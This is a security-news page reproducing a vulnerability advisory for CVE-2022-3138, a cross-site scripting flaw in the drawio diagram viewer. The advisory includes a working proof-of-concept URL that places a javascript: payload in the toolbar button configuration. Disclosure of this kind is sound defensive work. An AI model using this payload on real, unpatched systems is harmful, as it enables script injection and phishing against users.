Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-3138: XSS at https://viewer.diagrams.net/ in drawio

Cross-site Scripting (XSS) - Generic in GitHub repository jgraph/drawio prior to 20.3.0.

CVE
Open in Source
#xss#js#git#java

Description

The application uses a parameter to specify a url on the refresh and the back button, assigning it to location.href without sanitizing

Proof of Concept

Go to:

https://viewer.diagrams.net/index.html?tags=%7B%7D&highlight=0000ff&&layers=1&nav=1&toolbar=1&toolbar-config=%7B%22backBtn%22:%7B%22url%22:%22javascript:alert(document.domain)%22%7D,%22refreshBtn%22:%7B%22url%22:%22javascript:alert(document.domain)%22%7D%7D&title=xss.drawio#RdZNdb9sgFIZ%2FjaXtopUDTdZdxkmbatI2TVnVa2qoTQscD%2BPa6a%2FfIYA%2F1lWyZHjOy%2FnikNGdHg6WNfV34EJlJOdDRvcZIasrQjL%2F5fwUCF1HUFnJo2gCR%2FkmIswj7SQX7ULoAJSTzRKWYIwo3YIxa6Ffyp5ALaM2rBLvwLFk6j19kNzVgV6TLxO%2FE7KqU%2BTV5muwaJbEsZK2Zhz6GaI3Gd1ZABdWetgJ5ZuX%2BhLO3X5gHROzwrj%2FHLhvhf35%2BOx7QnLFHvFezqKMbBTqiycw3tK6Uyx186eDZLhozxexRcE6b%2FAyi8mOq8r%2Ff4vBJWcYNfgLppCakuYlxHxmr6wtrWzQuF1sfLr%2BW%2BcMW27dJw5lp7GiSw6aSfM5uEpFr39ct923fP9r%2F3ab3w2H432nL1ZjM8cmTVUR59OkRe20b8AKl62z8CJ2oMAiMWCEr1oq9Q9iSlYGtyWmI5AXr5igxNHYRoOWnPswRV9LJ44NK33MHh8CMgud4cLnnY8d8Q7E8OH9zQs5CNDC2RNK4gFK4yDFl0Q2cd9Pc5lQPRvJdIzFl1CNnqdhwUXsXdrOxiehaVTP8tmDpzd%2FAQ%3D%3D

Click on the refresh or the back icon on toolbar

Impact

XSS, phishing

Occurrences

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE